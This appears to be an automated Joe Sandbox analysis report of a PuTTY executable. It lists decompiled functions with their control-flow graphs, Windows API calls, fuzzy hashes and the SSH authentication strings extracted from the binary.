                    control_flow_graph 399 beb9b0-beb9d5 400 beba5e-beba60 399->400 401 beb9db-beb9e5 399->401 403 beba70-beba84 call c4dc50 400->403 402 beba06-beba12 401->402 405 beba14-beba2e RegCreateKeyExA 402->405 406 beba40-beba4e RegOpenKeyExA 402->406 408 beba50-beba53 405->408 409 beba30 405->409 406->408 410 beba62-beba67 406->410 412 beba55-beba5c RegCloseKey 408->412 413 beb9f0-beba04 408->413 409->410 410->403 411 beba69-beba6a RegCloseKey 410->411 411->403 412->413 413->400 413->402
                    APIs
                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00BEBA26
                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,0002001F), ref: 00BEBA4A
                    • RegCloseKey.ADVAPI32(?), ref: 00BEBA56
                    • RegCloseKey.ADVAPI32(?), ref: 00BEBA6A
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Close$CreateOpen
                    • String ID:
                    • API String ID: 1299239824-0
                    • Opcode ID: 2f1a6151c436465f34e62963235d4c7a4e3604697e9946bc6c239a82c80c3d01
                    • Instruction ID: ce24a07ae9cf0eb8f0d81679dbda436b9f486ad4d6f13b923aab109f9ffa6fe9
                    • Opcode Fuzzy Hash: 2f1a6151c436465f34e62963235d4c7a4e3604697e9946bc6c239a82c80c3d01
                    • Instruction Fuzzy Hash: 0B11B130205351ABE7208B26DD86F7B7BE8EB89B54F14116CF98A5B291DB70EC40DA52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCD550 Relevance: 6.0, APIs: 4, Instructions: 17COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • CreateDialogParamA.USER32(0000006F,00000000,00BCD590,00000000,?), ref: 00BCD562
                    • ShowWindow.USER32(00000000,00000000), ref: 00BCD56D
                    • SetActiveWindow.USER32(00000000), ref: 00BCD574
                    • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00BCD57B
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Window$ActiveCallbackCreateDialogDispatcherParamShowUser
                    • String ID:
                    • API String ID: 916146323-0
                    • Opcode ID: 0960da8827c3b98129c883950c990c51a20dad553b8def5644f77324c790fb20
                    • Instruction ID: d58ebc0561ca9b22f827568ed9ceebde95df29911e66caf0bed872cf26e2e08a
                    • Opcode Fuzzy Hash: 0960da8827c3b98129c883950c990c51a20dad553b8def5644f77324c790fb20
                    • Instruction Fuzzy Hash: C9D09E75541710BBD6211B60BC0DFDE3E14EB0B719F140550F607A64F4867515428A58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD35F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 415 bd35f0-bd3600 416 bd3630-bd3649 call c5d413 415->416 417 bd3602-bd3604 415->417 422 bd364d-bd3657 416->422 419 bd3610-bd3626 call beafa0 417->419 426 bd3628-bd362e 419->426 427 bd364b 419->427 424 bd36ae-bd36ca call c5d413 call bb69a0 422->424 425 bd3659-bd365d 422->425 425->424 429 bd3664 425->429 430 bd3666-bd3676 call bd1d20 425->430 431 bd3690-bd36aa call bd1d20 425->431 426->416 426->419 427->422 429->430 439 bd3678-bd3683 SetDlgItemTextA call be9100 430->439 441 bd368b-bd368f 430->441 438 bd36ac 431->438 431->439 438->441 443 bd3688 439->443 443->441
                    APIs
                    Strings
                    • false && "bad control type in label_change", xrefs: 00BD36B8
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD3635, 00BD36B3
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ItemText
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$false && "bad control type in label_change"
                    • API String ID: 3367045223-273940900
                    • Opcode ID: 10f9fe1ba85e322864151c438f7c85b94b6b5c0c693c16c2ac4a6ba915accd3f
                    • Instruction ID: c05fcc7f7abdeaf51dd1f1fb2998ea354526e3d28656110c09c0736870c35c81
                    • Opcode Fuzzy Hash: 10f9fe1ba85e322864151c438f7c85b94b6b5c0c693c16c2ac4a6ba915accd3f
                    • Instruction Fuzzy Hash: 23212772A08241BBD7209F24DD82F1AB7E6CB86B54F1901BAF81893387E771ED048752
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD30F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 444 bd30f0-bd30fc 445 bd30fe-bd3104 444->445 446 bd3130 444->446 447 bd3110-bd3126 call beafa0 445->447 448 bd3132-bd3146 call c5d413 446->448 454 bd3128-bd312e 447->454 455 bd3182-bd318b 447->455 453 bd3149-bd3157 448->453 456 bd3159-bd3167 453->456 457 bd316a-bd3181 SendDlgItemMessageA 453->457 454->446 454->447 455->453 458 bd318d-bd3190 455->458 456->457 458->448 459 bd3192-bd3196 458->459 459->453 460 bd3198 459->460 460->448
                    APIs
                    • SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 00BD3177
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD3137
                    • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00BD313C
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ItemMessageSend
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                    • API String ID: 3015471070-892283786
                    • Opcode ID: d6ad7e2c365f02be37bf386a2ed1ada93b03e966a63615e242a23587418a5b11
                    • Instruction ID: 8f291f717335804e7c511bf66a2dbe4eb26b1722ecb5a829c2950a3046b08c85
                    • Opcode Fuzzy Hash: d6ad7e2c365f02be37bf386a2ed1ada93b03e966a63615e242a23587418a5b11
                    • Instruction Fuzzy Hash: AB11E570640207AFE7208B04DC91F76F3E6EB99B54F0441AAF50667792E771AE44C792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD2E90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 461 bd2e90-bd2ea0 462 bd2ed8-bd2eda 461->462 463 bd2ea2-bd2ea8 461->463 465 bd2ee9-bd2efd call c5d413 462->465 464 bd2eb0-bd2ec6 call beafa0 463->464 470 bd2edc-bd2ee7 464->470 471 bd2ec8-bd2ece 464->471 472 bd2f00-bd2f14 SetDlgItemTextA 465->472 470->465 470->472 471->464 473 bd2ed0-bd2ed6 471->473 473->465
                    APIs
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD2EEE
                    • c && c->ctrl->type == CTRL_EDITBOX, xrefs: 00BD2EF3
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ItemText
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
                    • API String ID: 3367045223-2506229160
                    • Opcode ID: aaba2f508ac1ce7d6b0f403ee00c7b4feb99d6acb8975d91265c30b797c7e79a
                    • Instruction ID: 522ea20b359d56125c8b75a982a4432293b318de17a9f4a929e5dc157eb13d7e
                    • Opcode Fuzzy Hash: aaba2f508ac1ce7d6b0f403ee00c7b4feb99d6acb8975d91265c30b797c7e79a
                    • Instruction Fuzzy Hash: FB018B32608242AFD210CF44ECC2F5AF3E8EBA9748F0504A6F90893711E372BC14CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C65BD4 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,?,?,?,00C631F0,00000001,00000364,?,00000006,000000FF,?,00C5D423,00000003,?,?,00BEAE09), ref: 00C65C15
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: 039e06034ab7d5a3586006d5aa2845a947d4db1616488c21ec74d9d3464ee152
                    • Instruction ID: 665d802fba333665740763067a45bdbf3b066f1997575e569da669dc13f6f8a6
                    • Opcode Fuzzy Hash: 039e06034ab7d5a3586006d5aa2845a947d4db1616488c21ec74d9d3464ee152
                    • Instruction Fuzzy Hash: DFF0B431608B2577DB316A669C81B6A7748AF89770F358521FC159B190CA61D94192A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C64971 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,00C63C6B,19E850E8,?,00C63C6B,00000220,?,00C5DB94,19E850E8), ref: 00C649A3
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: bfa8d2ae8caffe2d6f2cfe2fa02ac590b410182244e2111c95bc9fc28259de6e
                    • Instruction ID: c0aaf29e7be57a27399ae4b600ec4d3986f388f56d70ecd0e784c9fa0c9609c3
                    • Opcode Fuzzy Hash: bfa8d2ae8caffe2d6f2cfe2fa02ac590b410182244e2111c95bc9fc28259de6e
                    • Instruction Fuzzy Hash: 5DE02B311802205AD7353B669C80B6F364CDF417B0F150120FC19970D4DB10CD8082E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BEB850 Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C16EA0: GetSystemDirectoryA.KERNEL32 ref: 00C16EB2
                      • Part of subcall function 00C16EA0: GetSystemDirectoryA.KERNEL32 ref: 00C16EF6
                      • Part of subcall function 00BE8420: _strlen.LIBCMT ref: 00BE8437
                      • Part of subcall function 00BE8420: _strlen.LIBCMT ref: 00BE8461
                      • Part of subcall function 00BE8420: _strcat.LIBCMT ref: 00BE848C
                      • Part of subcall function 00BE8420: _strlen.LIBCMT ref: 00BE8495
                      • Part of subcall function 00BE8420: _strcat.LIBCMT ref: 00BE84B2
                      • Part of subcall function 00BE8420: _strlen.LIBCMT ref: 00BE84BB
                    • LoadLibraryA.KERNELBASE(00000000,00000000,?,00BF99F0,kernel32.dll), ref: 00BEB86F
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen$DirectorySystem_strcat$LibraryLoad
                    • String ID:
                    • API String ID: 3346121862-0
                    • Opcode ID: bc2081f45c75406b004216fe66d5d3323aa3068e56095d565e2b5eb371392261
                    • Instruction ID: 2285e016b589188702a99ece9f220b5170e948beccc3268d87bdb0bf959f7d8d
                    • Opcode Fuzzy Hash: bc2081f45c75406b004216fe66d5d3323aa3068e56095d565e2b5eb371392261
                    • Instruction Fuzzy Hash: 62D05BB6A051503BDA113265BC0BFAB259DCF82364F0505B4F805E7342D5255D4081E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00C08B40 Relevance: 204.8, APIs: 7, Strings: 108, Instructions: 3561COMMON
                    Download Yara Rule
                    APIs
                    • _strlen.LIBCMT ref: 00C09DF1
                      • Part of subcall function 00BE9280: _strlen.LIBCMT ref: 00BE928B
                    • _strlen.LIBCMT ref: 00C0BD7C
                      • Part of subcall function 00BFD350: _strlen.LIBCMT ref: 00BFD35B
                      • Part of subcall function 00C12540: _strlen.LIBCMT ref: 00C12546
                      • Part of subcall function 00BEE7A0: _strlen.LIBCMT ref: 00BEE7AB
                      • Part of subcall function 00BEE7A0: _strcat.LIBCMT ref: 00BEE7C7
                    Strings
                    • passphrase prompt, xrefs: 00C0B1F1
                    • Authentication plugin set username '%s', xrefs: 00C0957C
                    • Sent new password, xrefs: 00C0BCF6
                    • GSSAPI authentication initialised, xrefs: 00C0B245
                    • Authentication plugin failed to set up keyboard-interactive authentication:, xrefs: 00C0A5E8
                    • Offer of public key accepted, xrefs: 00C0A8CD
                    • Authentication plugin failed to initialise:, xrefs: 00C094E6
                    • Pageant's response was truncated, xrefs: 00C0931D
                    • Server refused public-key signature despite accepting key!, xrefs: 00C09CE1
                    • Unable to load key (%s), xrefs: 00C09066
                    • GSSAPI authentication loop finished OK, xrefs: 00C0B3E0
                    • Failed to get reply from Pageant, xrefs: 00C090BD
                    • s->type == AUTH_TYPE_PASSWORD, xrefs: 00C0AAEC
                    • Server rejected new password, xrefs: 00C0BD32
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/userauth2-client.c, xrefs: 00C09409, 00C0A547, 00C0AAE7, 00C0B784, 00C0B7F4
                    • password-change prompt, xrefs: 00C0BDB2
                    • Started authentication plugin: %s, xrefs: 00C0936A
                    • Trying gssapi-keyex..., xrefs: 00C0A1BD
                    • Received malformed PLUGIN_PROTOCOL_REJECT from auth helper plugin, xrefs: 00C0AD26
                    • Further authentication required, xrefs: 00C09AE6
                    • Pageant failed to provide a signature, xrefs: 00C09058
                    • Current password (blank for previously entered password): , xrefs: 00C0BA91
                    • Authentication plugin declined to help with keyboard-interactive: %.*s, xrefs: 00C0A648
                    • Access denied, xrefs: 00C0AB12
                    • none, xrefs: 00C0984D
                    • gssapi-with-mic, xrefs: 00C09C01, 00C0A2B7, 00C0B3FB
                    • Pageant refused signing request, xrefs: 00C0903F
                    • Passwords do not match, xrefs: 00C0BBCE
                    • Authentication plugin agreed to help with keyboard-interactive, xrefs: 00C0A65B
                    • Wrong passphrase, xrefs: 00C0B17F
                    • Auth helper plugin announced unsupported version number %u, xrefs: 00C094DA
                    • Pageant failed to respond to signing request, xrefs: 00C090C7
                    • GSSAPI authentication failed, xrefs: 00C0B33C
                    • No supported authentication methods available (server sent: %s), xrefs: 00C0AC03
                    • Trying gssapi-with-mic..., xrefs: 00C0A25C
                    • Key file contains public key only, xrefs: 00C08D9E
                    • Confirm new password: , xrefs: 00C0BACD
                    • Unable to use this certificate file (%s), xrefs: 00C09251
                    • Further authentication required, xrefs: 00C09ACF
                    • %s, xrefs: 00C0BA15
                    • expected PLUGIN_PROTOCOL_ACCEPT or PLUGIN_PROTOCOL_REJECT, xrefs: 00C0AC55
                    • %s@%s's password: , xrefs: 00C09FEC
                    • expected PLUGIN_KI_SERVER_RESPONSE or PLUGIN_PROTOCOL_USER_REQUEST, xrefs: 00C0B9E7
                    • Passphrase for key "%s": , xrefs: 00C0AF06
                    • Sending Pageant's response, xrefs: 00C095BC
                    • Enter new password: , xrefs: 00C0BAAF
                    • keyboard-interactive authentication prompt, xrefs: 00C0B622
                    • GSSAPI import name failed - Bad service name, xrefs: 00C0AD6B
                    • Pageant has %zu SSH-2 keys, xrefs: 00C08F1F
                    • Using username "%s"., xrefs: 00C096DE
                    • Access granted, xrefs: 00C0AC0D
                    • Unable to use this key file (%s), xrefs: 00C09118
                    • unrecognised certificate type '%s', xrefs: 00C095B3
                    • Received malformed PLUGIN_INIT_RESPONSE from auth helper plugin, xrefs: 00C09498
                    • Received unexpected packet after SSH_MSG_USERAUTH_GSSAPI_ERRTOK (expected SSH_MSG_USERAUTH_FAILURE): type %d (%s), xrefs: 00C0B495
                    • Pre-authentication banner message from server:, xrefs: 00C0996E
                    • Reading certificate file "%s", xrefs: 00C091A6
                    • Authentication plugin declined to help with keyboard-interactive, xrefs: 00C0A689
                    • Unable to authenticate, xrefs: 00C0AACC, 00C0B1E5, 00C0B616, 00C0BDA6
                    • password, xrefs: 00C09BBD, 00C0A0D3, 00C0BC6A
                    • username prompt, xrefs: 00C098AC
                    • login as: , xrefs: 00C09732
                    • GSSAPI authentication initialisation failed, xrefs: 00C0B361
                    • Server refused public-key signature despite accepting key!, xrefs: 00C09CCA
                    • Authenticating with public key "%s", xrefs: 00C0A902
                    • Sent password, xrefs: 00C0A123
                    • Pageant is running. Requesting keys., xrefs: 00C092CE
                    • key type '%s' is not a certificate, xrefs: 00C09624
                    • password prompt, xrefs: 00C0AAD8
                    • Configured key file not in Pageant, xrefs: 00C08F90
                    • GSSAPI authentication - wrong response from server, xrefs: 00C0A3E7
                    • Unable to use certificate file "%s" (%s), xrefs: 00C0927A
                    • Offered public key, xrefs: 00C0A886
                    • Unable to load key file "%s" (%s), xrefs: 00C09093
                    • Received malformed PLUGIN_INIT_FAILURE from auth helper plugin, xrefs: 00C094BA
                    • End of keyboard-interactive prompts from server, xrefs: 00C0B69C
                    • End of keyboard-interactive prompts from plugin, xrefs: 00C0B6A1, 00C0B6B7
                    • GSSAPI authentication request refused, xrefs: 00C0A40C
                    • gssapi-keyex, xrefs: 00C09C25, 00C0A1D8
                    • End of banner message from server, xrefs: 00C09A55
                    • Reading key file "%s", xrefs: 00C08D1D
                    • SSH login name, xrefs: 00C0971C
                    • <, xrefs: 00C0B62C
                    • publickey, xrefs: 00C09BA4, 00C09E83, 00C0A81B, 00C0A9EF, 00C0AE27
                    • New SSH password, xrefs: 00C0BA5E
                    • Attempting GSSAPI authentication, xrefs: 00C0A2C5
                    • s->authplugin, xrefs: 00C0940E, 00C0A54C, 00C0B789, 00C0B7F9
                    • GSSAPI authentication failed to get credentials, xrefs: 00C0ABCA
                    • %.*s, xrefs: 00C09516, 00C0A618
                    • Pageant failed to respond to signing request, xrefs: 00C090E0
                    • Authentication was trivial! Abandoning session as specified in configuration., xrefs: 00C0AC40
                    • No supported authentication methods available, xrefs: 00C0ABEF
                    • <, xrefs: 00C0B49F
                    • Unable to load private key (%s), xrefs: 00C0B195
                    • Received unexpected packet in response to authentication request, type %d (%s), xrefs: 00C09AA0
                    • Trying Pageant key #%zu, xrefs: 00C09E28
                    • SSH key passphrase, xrefs: 00C0AEEA
                    • Sent public key signature, xrefs: 00C0B102
                    • Pageant key #%zu matches configured key file, xrefs: 00C09637
                    • Attempting keyboard-interactive authentication, xrefs: 00C0A4DA
                    • Authenticating with public key "%.*s" from agent, xrefs: 00C0A98D
                    • Cannot use this private key (%s), xrefs: 00C0B00A
                    • Server requested password change, xrefs: 00C0A169, 00C0B9FA, 00C0BA14
                    • Unable to use key file "%s" (%s), xrefs: 00C0914C
                    • GSSAPI authentication - bad server response, xrefs: 00C0B452
                    • GSSAPI import name failed, xrefs: 00C0ADA1, 00C0ADA6
                    • expected PLUGIN_INIT_RESPONSE or PLUGIN_INIT_FAILURE, xrefs: 00C094C4
                    • Password authentication failed, xrefs: 00C0AAF9
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen$_strcat
                    • String ID: %.*s$%s$%s@%s's password: $/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/userauth2-client.c$<$<$Access denied$Access granted$Attempting GSSAPI authentication$Attempting keyboard-interactive authentication$Auth helper plugin announced unsupported version number %u$Authenticating with public key "%.*s" from agent$Authenticating with public key "%s"$Authentication plugin agreed to help with keyboard-interactive$Authentication plugin declined to help with keyboard-interactive$Authentication plugin declined to help with keyboard-interactive: %.*s$Authentication plugin failed to initialise:$Authentication plugin failed to set up keyboard-interactive authentication:$Authentication plugin set username '%s'$Authentication was trivial! Abandoning session as specified in configuration.$Cannot use this private key (%s)$Configured key file not in Pageant$Confirm new password: $Current password (blank for previously entered password): $End of banner message from server$End of keyboard-interactive prompts from plugin$End of keyboard-interactive prompts from server$Enter new password: $Failed to get reply from Pageant$Further authentication required$Further authentication required$GSSAPI authentication - bad server response$GSSAPI authentication - wrong response from server$GSSAPI authentication failed$GSSAPI authentication failed to get credentials$GSSAPI authentication initialisation failed$GSSAPI authentication initialised$GSSAPI authentication loop finished OK$GSSAPI authentication request refused$GSSAPI import name failed$GSSAPI import name failed - Bad service name$Key file contains public key only$New SSH password$No supported authentication methods available$No supported authentication methods available (server sent: %s)$Offer of public key accepted$Offered public key$Pageant failed to provide a signature$Pageant failed to respond to signing request$Pageant failed to respond to signing request$Pageant has %zu SSH-2 keys$Pageant is running. Requesting keys.$Pageant key #%zu matches configured key file$Pageant refused signing request$Pageant's response was truncated$Passphrase for key "%s": $Password authentication failed$Passwords do not match$Pre-authentication banner message from server:$Reading certificate file "%s"$Reading key file "%s"$Received malformed PLUGIN_INIT_FAILURE from auth helper plugin$Received malformed PLUGIN_INIT_RESPONSE from auth helper plugin$Received malformed PLUGIN_PROTOCOL_REJECT from auth helper plugin$Received unexpected packet after SSH_MSG_USERAUTH_GSSAPI_ERRTOK (expected SSH_MSG_USERAUTH_FAILURE): type %d (%s)$Received unexpected packet in response to authentication request, type %d (%s)$SSH key passphrase$SSH login name$Sending Pageant's response$Sent new password$Sent password$Sent public key signature$Server refused public-key signature despite accepting key!$Server refused public-key signature despite accepting key!$Server rejected new password$Server requested password change$Started authentication plugin: %s$Trying Pageant key #%zu$Trying gssapi-keyex...$Trying gssapi-with-mic...$Unable to authenticate$Unable to load key (%s)$Unable to load key file "%s" (%s)$Unable to load private key (%s)$Unable to use certificate file "%s" (%s)$Unable to use key file "%s" (%s)$Unable to use this certificate file (%s)$Unable to use this key file (%s)$Using username "%s".$Wrong passphrase$expected PLUGIN_INIT_RESPONSE or PLUGIN_INIT_FAILURE$expected PLUGIN_KI_SERVER_RESPONSE or PLUGIN_PROTOCOL_USER_REQUEST$expected PLUGIN_PROTOCOL_ACCEPT or PLUGIN_PROTOCOL_REJECT$gssapi-keyex$gssapi-with-mic$key type '%s' is not a certificate$keyboard-interactive authentication prompt$login as: $none$passphrase prompt$password$password prompt$password-change prompt$publickey$s->authplugin$s->type == AUTH_TYPE_PASSWORD$unrecognised certificate type '%s'$username prompt
                    • API String ID: 1497175149-2033318085
                    • Opcode ID: 645717fb949643972a12e2dd6cb586dc7f2ca3988340e2230c258afede3d6f99
                    • Instruction ID: 725485725f80f5c0ca81f345cdf2c4cfc65e6da55c06330ebd11dca8bd7509ec
                    • Opcode Fuzzy Hash: 645717fb949643972a12e2dd6cb586dc7f2ca3988340e2230c258afede3d6f99
                    • Instruction Fuzzy Hash: 6B53F5B59007409FEB20AF64DC46B6AB7E5AF54308F044468F85E97393EB32ED58CB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C05060 Relevance: 184.5, APIs: 2, Strings: 102, Instructions: 2486COMMON
                    Download Yara Rule
                    Strings
                    • passphrase prompt, xrefs: 00C07212
                    • host key verification, xrefs: 00C0557F
                    • Couldn't load private key from %s (%s)., xrefs: 00C065EF
                    • Received unexpected packet in response to password authentication, type %d (%s), xrefs: 00C0726B
                    • Sending unpadded password, xrefs: 00C06EEF
                    • Pageant's response was truncated, xrefs: 00C05FB5
                    • Server refused our public key., xrefs: 00C066E1
                    • Requesting compression, xrefs: 00C07104
                    • Unable to load key (%s), xrefs: 00C05B5B
                    • Failed to get reply from Pageant, xrefs: 00C05EFD
